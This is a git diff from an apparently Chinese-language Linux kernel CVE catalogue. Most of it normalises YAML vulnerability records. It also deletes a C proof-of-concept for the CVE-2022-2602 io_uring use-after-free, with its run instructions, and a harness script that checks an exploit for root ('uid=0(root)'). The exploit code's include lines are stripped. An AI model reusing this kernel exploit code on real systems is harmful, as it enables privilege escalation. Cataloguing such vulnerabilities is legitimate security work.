@@ -11,13 +11,15 @@ info: Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM - (Linux-kernel < 5.11) + Linux-kernel < 5.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3493 - https://ubuntu.com/security/notices/USN-4917-1 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-3493 - cwe-id: CWE-269, CEW-270 - tags: cve2021,权限提升 \ No newline at end of file + cwe-id: CWE-269, CWE-270 + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml index 15bc9b531d0ec38d85248ec0857c5106f7d22b69..05ed7647b4a98d769709ef7695f28f064521706e 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml @@ -17,4 +17,6 @@ info: cvss-score: 8.8 cve-id: CVE-2021-4154 cwe-id: CWE-416 + cnvd-id: None + kve-id: None tags: cve2021, 内存错误引用 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml index e34d9dd16e4f24bb4117e2ec45106b376d5e9986..92ccf20a5ead5b0141fa6f58468614491ce9fd9d 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml @@ -6,7 +6,7 @@ info: description: | The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access scope-of-influence: - Linux 2.1.94~v5.13.12 + Linux 2.1.94 < Linux-Kernel < v5.13.12 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42008 - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13 @@ -16,6 +16,6 @@ info: cvss-score: 7.8 cve-id: CVE-2021-42008 cwe-id: CWE-787 - cnvd-id: - kve-id: + cnvd-id: None + kve-id: None tags: 协议解码溢出 \ No newline at end of file 
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml index af36da213d1b95eb4606ba5cad064c43361dcf70..004b603d9f68a474299c82910747c5e9c9af74e5 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml @@ -11,8 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-4204 - https://www.openwall.com/lists/oss-security/2022/01/11/4 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H cvss-score: 7.1 cve-id: CVE-2021-4204 - cwe-id: CWE-787, CEW-20 - tags: cve2021,权限提升 \ No newline at end of file + cwe-id: CWE-787, CWE-20 + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml index 883f66527f0aa8500f86675b9572d4f56929610f..ad6af5fdd03985fff4c7406ca73a7cb3d544a7f5 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml @@ -5,13 +5,10 @@ info: severity: medium description: | Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。 - scope-of-influence: - Linux kernel before 5.14.14 - + Linux kernel < 5.14.14 reference: - https://nvd.nist.gov/vuln/detail/cve-2021-42327 - classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 6.7 @@ -19,5 +16,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: 缓冲区溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2602/README.md b/cve/linux-kernel/2022/CVE-2022-2602/README.md deleted file mode 100644 index ccaf80aa301dfaed97b2ce40dd71ab09ef5fc5df..0000000000000000000000000000000000000000 
--- a/cve/linux-kernel/2022/CVE-2022-2602/README.md +++ /dev/null @@ -1,6 +0,0 @@ -### 漏洞复现 -```shell -$ gcc poc.c -o poc -$ chmod +x ./poc -$ ./poc -``` \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2602/poc.c b/cve/linux-kernel/2022/CVE-2022-2602/poc.c deleted file mode 100644 index 89696fba578666bc2a8069eb39093ddbd93ba6e4..0000000000000000000000000000000000000000 --- a/cve/linux-kernel/2022/CVE-2022-2602/poc.c +++ /dev/null 
@@ -1,174 +0,0 @@ -#define _GNU_SOURCE -#include -#include -#include -#include -#include - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -static int userfaultfd(int flags) -{ - return syscall(__NR_userfaultfd, flags); -} - -static char buffer[4096]; -static void fault_manager(int ufd) -{ - struct uffd_msg msg; - struct uffdio_copy copy; - read(ufd, &msg, sizeof(msg)); - if (msg.event != UFFD_EVENT_PAGEFAULT) - err(1, "event not pagefault"); - copy.dst = msg.arg.pagefault.address; - copy.src = (long) buffer; - copy.len = 4096; - copy.mode = 0; - copy.copy = 0; - sleep(2); - ioctl(ufd, UFFDIO_COPY, ©); - close(ufd); -} - -static char *bogus; - -static void start_ufd(int ufd) -{ - struct uffdio_api api; - struct uffdio_register reg; - - bogus = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - - api.api = UFFD_API; - api.features = 0; - api.ioctls = 0; - ioctl(ufd, UFFDIO_API, &api); - - reg.range.start = (long) bogus; - reg.range.len = 4096; - reg.mode = UFFDIO_REGISTER_MODE_MISSING; - reg.ioctls = 0; - - ioctl(ufd, UFFDIO_REGISTER, ®); -} - - -int sendfd(int s, int fd) -{ - struct msghdr msg; - char buf[4096]; - struct cmsghdr *cmsg; - int fds[1] = { fd }; - - memset(&msg, 0, sizeof(msg)); - memset(buf, 0, sizeof(buf)); - - msg.msg_control = buf; - msg.msg_controllen = sizeof(buf); - - cmsg = CMSG_FIRSTHDR(&msg); - cmsg->cmsg_level = SOL_SOCKET; - cmsg->cmsg_type = SCM_RIGHTS; - cmsg->cmsg_len = CMSG_LEN(sizeof(fds)); - memcpy(CMSG_DATA(cmsg), fds, sizeof(fds)); - - msg.msg_controllen = CMSG_SPACE(sizeof(fds)); - - sendmsg(s, &msg, 0); -} - -int io_uring_setup(int r, void *p) -{ - return syscall(__NR_io_uring_setup, r, p); -} - -int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig) -{ - return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig); -} - -int io_uring_register(unsigned int fd, unsigned int opcode, 
void *arg, unsigned int nr_args) -{ - return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args); -} - -int prepare_request(int fd, struct io_uring_params *params, struct io_uring *ring) -{ - struct io_uring_sqe *sqe; - io_uring_queue_mmap(fd, params, ring); - sqe = io_uring_get_sqe(ring); - sqe->opcode = IORING_OP_WRITEV; - sqe->fd = 1; - sqe->addr = (long) bogus; - sqe->len = 1; - sqe->flags = IOSQE_FIXED_FILE; -} - -int main(int argc, char **argv) -{ - int ufd; - pid_t manager; - - struct io_uring ring; - int fd; - struct io_uring_params *params; - int rfd[32]; - int s[2]; - int backup_fd; - - struct iovec *iov; - iov = (void *) buffer; - iov->iov_base = "hello, world!\n"; - iov->iov_len = 14; - - ufd = userfaultfd(0); - if (ufd < 0) - err(1, "userfaultfd"); - start_ufd(ufd); - - if ((manager = fork()) == 0) { - fault_manager(ufd); - exit(0); - } - close(ufd); - - socketpair(AF_UNIX, SOCK_DGRAM, 0, s); - - params = malloc(sizeof(*params)); - memset(params, 0, sizeof(*params)); - params->flags = IORING_SETUP_SQPOLL; - fd = io_uring_setup(32, params); - - rfd[0] = s[1]; - rfd[1] = open("null", O_RDWR | O_CREAT | O_TRUNC, 0644); - io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); - close(rfd[1]); - - sendfd(s[0], fd); - - close(s[0]); - close(s[1]); - - prepare_request(fd, params, &ring); - io_uring_submit(&ring); - - io_uring_queue_exit(&ring); - - sleep(1); - - close(socket(AF_UNIX, SOCK_DGRAM, 0)); - - wait(NULL); - wait(NULL); - - return 0; -} diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml index 4fa8b80c5e73194a63ae36f1e894a2e5424ab6f4..0e6d5a3b21775246abc7c57eea0cf1c63050a7a5 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml 
@@ -6,14 +6,16 @@ info: description: | Linux kernel 存在输入验证错误漏洞,该漏洞源于在 Linux kernel 的 Filesystem Context 中的 legacy_parse_param 函数验证提供的参数长度的方式中发现了一个基于堆的缓冲区溢出缺陷。 非特权(在启用非特权用户命名空间的情况下,否则需要命名空间的 CAP_SYS_ADMIN 特权)本地用户能够打开不支持文件系统上下文 API 的文件系统(因此回退到遗留处理)可以使用此缺陷来提升他们在系统上的权限。 scope-of-influence: - 5.1-rc1~5.16.2 + 5.1-rc1 ≤ Linux-Kernel ≤ 5.16.2 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0185 - https://nvd.nist.gov/vuln/detail/CVE-2022-0185 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.4 cve-id: CVE-2022-0185 cwe-id: CWE-190 - tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 权限提升, 容器逃逸, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml index 64fbf4c341e37ad6fbc62d806cfa8ad33e18f17f..6ddbf77b3ba1bc037f4c1e8e6cfc90946d528605 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml @@ -1,6 +1,5 @@ id: CVE-2022-0435 -source: - https://github.com/wlswotmd/CVE-2022-0435 +source: https://github.com/wlswotmd/CVE-2022-0435 info: name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用. severity: high diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml index 6d5a4c484f2af8469a556c354bcf011be85218f7..8e9389073cf4e9e067074fa2b1dbb8048049724e 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml 
@@ -2,18 +2,20 @@ id: CVE-2022-0492 source: https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 + severity: High description: | A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly. scope-of-influence: - 2.6.24-rc1~5.17-rc3 + 2.6.24-rc1 ≤ Linux-Kernel ≤ 5.17-rc3 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0492 - https://nvd.nist.gov/vuln/detail/CVE-2022-0492 - https://git.kernel.org/linus/24f6008564183aa120d07c03d9289519c2fe02af classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0492 cwe-id: CWE-287 - tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 权限提升, 容器逃逸, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml index b5a2849209081f9001eb55ecba52e8f74da53dd9..04f3fdc482c6e1b3743532a7022011c2d5a28531 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml @@ -12,7 +12,7 @@ info: - https://bugzilla.redhat.com/show_bug.cgi?id=2060795 - https://security.netapp.com/advisory/ntap-20220325-0005/ classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0847 cwe-id: CWE-665, CWE-281 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml index 6cbe896836e21237d35ac9e0cb1ab2809da6bf8c..14847983ab63369e8f65219bad7634c2e70751a5 100644 
--- a/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml @@ -15,6 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2022-0995 cwe-id: CWE-787 - cnvd-id: - kve-id: - tags: 内核越界,权限提升,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 内核越界, 权限提升, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml index d4339dfcc0df33a5a18e1a1e7c3127d15689d120..0fa3364c6f733fcd00d1fcd73f12949964a150b1 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml @@ -2,17 +2,19 @@ id: CVE-2022-1015 source: https://github.com/pqlx/CVE-2022-1015 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high + severity: Medium description: | 在netfilter子系统的linux/net/netfilter/nf_tables_api.c中发现了Linux内核的一个缺陷。此漏洞允许本地用户导致越界写入问题。 scope-of-influence: - 5.12 ≤ kernel < 5.17 + 5.12 ≤ Linux-Kernel < 5.17 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-1015 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e1acfa387b9ff82cfc7db8cc3b6959221a95851 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H cvss-score: 6.6 cve-id: CVE-2022-1015 cwe-id: CWE-787 - tags: cve2022,权限提升 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml index d07729f3b58a5d61565cdfb608d1e53d99062544..7c50227b69234f8d70d55b0842699fb9a4f04692 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml @@ -16,4 +16,5 @@ info: cve-id: CVE-2022-1679 cwe-id: CWE-416 cnvd-id: None + kve-id: None tags: 权限提升, cve2022 
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml index dec1b6bf776cee497be00474b19a3a8e174c941b..461d29121b5839cc80ee7d9ae690db3558582318 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml @@ -6,7 +6,7 @@ info: description: | 由于 Linux 内核的 BPF 验证器存在一个空指针漏洞,没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算。攻击者可利用该漏洞在获得低权限的情况下,构造恶意数据执行空指针引用攻击,最终获取服务器 root 权限 scope-of-influence: - Linux kernel(>=5.8 && <=5.16) + 5.8 ≤ Linux kernel ≤ 5.16 reference: - https://www.openwall.com/lists/oss-security/2022/06/04/3 - https://security.netapp.com/advisory/ntap-20220217-0002/ @@ -17,4 +17,4 @@ info: cwe-id: CWE-476 cnvd-id: None kve-id: None - tags: cve2022,权限提升 \ No newline at end of file + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml index de53968bd0d1b71b85956541c04238094fb7f73b..7ac52ce3dbfd185b173aad94460625ab48177051 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml @@ -6,7 +6,7 @@ info: description: | 由于Linux kernel中存在资源管理错误漏洞,当kernel/ucount.c(非特权时)启用非特权用户命名空间时,允许释放后继续使用和特权升级,因为ucounts对象的寿命可以比其命名空间长。 scope-of-influence: - Linux kernel(>=5.14 && <=5.16.4) + 5.14 ≤ Linux kernel ≤ 5.16.4 reference: - https://ubuntu.com/security/CVE-2022-24122 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24122 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml index 75f508925d2a26f0fbffba51b8fcd25e29657c64..6fc8ac15e172aa795be80fe4797bddaaaa8a8f05 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml 
@@ -1,6 +1,5 @@ id: CVE-2022-25258 -source: - https://github.com/szymonh/d-os-descriptor +source: https://github.com/szymonh/d-os-descriptor info: name: Linux kernel是Linux操作系统的主要组件,也是计算机硬件与其进程之间的核心接口。它负责两者之间的通信,还要尽可能高效地管理资源。Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用。 severity: medium diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml index d64f2726bf2bef6aa76afd6d322193884ab2515a..5c7a3abc8767a6fe1a6e514178eb69266d0741c3 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml @@ -10,10 +10,10 @@ info: reference: - https://nvd.nist.gov/vuln/detail/cve-2022-25265 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25265 cwe-id: CWE-913 - cnvd-id: none - kve-id: none + cnvd-id: None + kve-id: None tags: Linux kernel, 内存损坏 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml index 2c62a5ceb572ffaf6f134d763049dcaef7c170fd..4018b6f4946a4f215c05e451ba5fd1d6ccf1aa80 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml @@ -14,5 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25636 - cnvd-id: CNNVD-202202-1743 - tags: 堆越界,权限提升,cve2022 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: 堆越界, 权限提升, cve2022 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml index d857929551429400189d9e6f2c1c23a2f28d54c0..271dcfba3fa01b8f0371dd0518c5d468249d1b33 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml 
@@ -25,5 +25,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 6.7 cve-id: CVE-2022-2586 - cnvd-id: NONE + cwe-id: None + cnvd-id: None + kve-id: None tags: netfilter, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml index d5584e0f57e7d617549fcd036be57a1c0703a2d5..6286b95371fafbd406462ba5a41dce0812e9fe70 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml @@ -15,6 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2022-2588 cwe-id: CWE-416 - cnvd-id: - kve-id: - tags: UAF,拒绝服务,权限提升,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: UAF, 拒绝服务, 权限提升, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml deleted file mode 100644 index 1f1fc84d8f2899ce73f3edda97883d5d010feafc..0000000000000000000000000000000000000000 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: CVE-2022-2602 -source: https://seclists.org/oss-sec/2022/q4/57 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high - description: | - io_uring UAF, Unix SCM garbage collection - scope-of-influence: - Linux kernel < 5.10.149-1 - reference: - - https://ubuntu.com/security/CVE-2022-2602 - classification: - cvss-metrics: CVSS:3.1 - cvss-score: 漏洞评分 - cve-id: CVE-2022-2602 - cwe-id: None - cnvd-id: None - kve-id: None - tags: cve2022,UAF \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml index 01b0e4d713b79d49e04046b7c03baa6b0286ba5f..74482ef6814231f975e66e233408b9c694ab8726 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml 
@@ -1,48 +1,20 @@ -FormatVer: 20220411 -Id: CVE-2022-2639 -Belong: kernel -PocHazardLevel: low -Source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion -SiteInfo: - Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 - Severity: high - Description: +id: CVE-2022-2639 +source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 + severity: high + description: 由于 openvswitch模块中reserve_sfa_size()函数在使用过程中存在缺陷,导致本地经过身份认证的攻击者可以利用漏洞提升至root权限 - ScopeOfInfluence: - kernel(>=3.13 && <5.18) - References: + scopeOfInfluence: + 3.13 ≤ Linux-Kernel < 5.18 + references: - https://nvd.nist.gov/vuln/detail/CVE-2022-2639 - https://github.com/torvalds/linux/commit/cefa91b2332d7009bc0be5d951d6cbbf349f90f8 - SiteClassification: - CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - CvssScore: 7.8 - CveId: CVE-2022-2639 - CweId: None - CnvdId: None - KveId: None - Tags: - - ve2022 - - 权限提升 -SiteRequests: - Implement: - ImArray: - - Exec : "CVE-2022-2639_x86_64" - Args : - ExpireTime: 30 #second - - # < input - # > output - # . wait - # ? condition - # : content - # - #组合起来 - # >. 等待直到输出 - # << 输入字符 - # >?判断条件 - Inter: - - ">.:infinitely ..." #等待输出'infinitely ...' - - "<<:id\n" #输入'id\n' - - ">.:\n" #等待输出'\n' - - ">?:uid=0(root)" #判断输出为'uid=0(root)'为成功 - Condition: None + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-2639 + cwe-id: CWE-171, CWE-787, CWE-192 + cnvd-id: None + kve-id: None + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml index e9c89f4bcb42a4a4240e6d9a6a6b87285ff43fb8..cc94bd93ba3099130b785ae169bae6111b392cc9 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml 
@@ -6,7 +6,7 @@ info: description: | Linux kernel 5.16.15之前版本存在安全漏洞,该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。 scope-of-influence: - ~ linux kernel 5.17-rc5 + linux kernel < 5.17-rc5 reference: - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15 - https://www.debian.org/security/2022/dsa-5173 @@ -15,4 +15,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-27666 - tags: 缓冲区溢出,权限提升,cve2022 + cwe-id: CWE-787 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出, 权限提升, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml index 611fb2f14924f12afb97261c2172e9bad80466d9..1f8c0acbcaf5d381cd3b5a4399c01e6fc039d806 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml @@ -14,5 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-32250 - cnvd-id: CNNVD-202206-407 - tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022 + cwe-id: CWE-416 + cnvd-id: None + kve-id: None + tags: Linux Kernel, cve2022 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml index 179205792b18780e8e59d9110a0bec5c5a6c9dff..e38f5778c57e8a59473128fec6acfa719c1b0db0 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml @@ -6,7 +6,7 @@ info: description: | Linux kernel 5.18.9版本及之前版本存在安全漏洞,该漏洞源于。本地攻击者利用该漏洞使用 nft_set_elem_init 中的类型混淆错误(导致缓冲区溢出)来提升权限。 scope-of-influence: - Linux kernel(>=5.8.0 && <=5.18.9) + 5.8.0 ≤ Linux kernel ≤ 5.18.9 reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34918 - https://nvd.nist.gov/vuln/detail/CVE-2022-34918 
diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml similarity index 86% rename from cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml rename to cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml index eb773fd638c81bc9ea9f9193d64d4af14cafef48..f915cfe692a58478ab6c94370d5bfb8dfecec53d 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml 
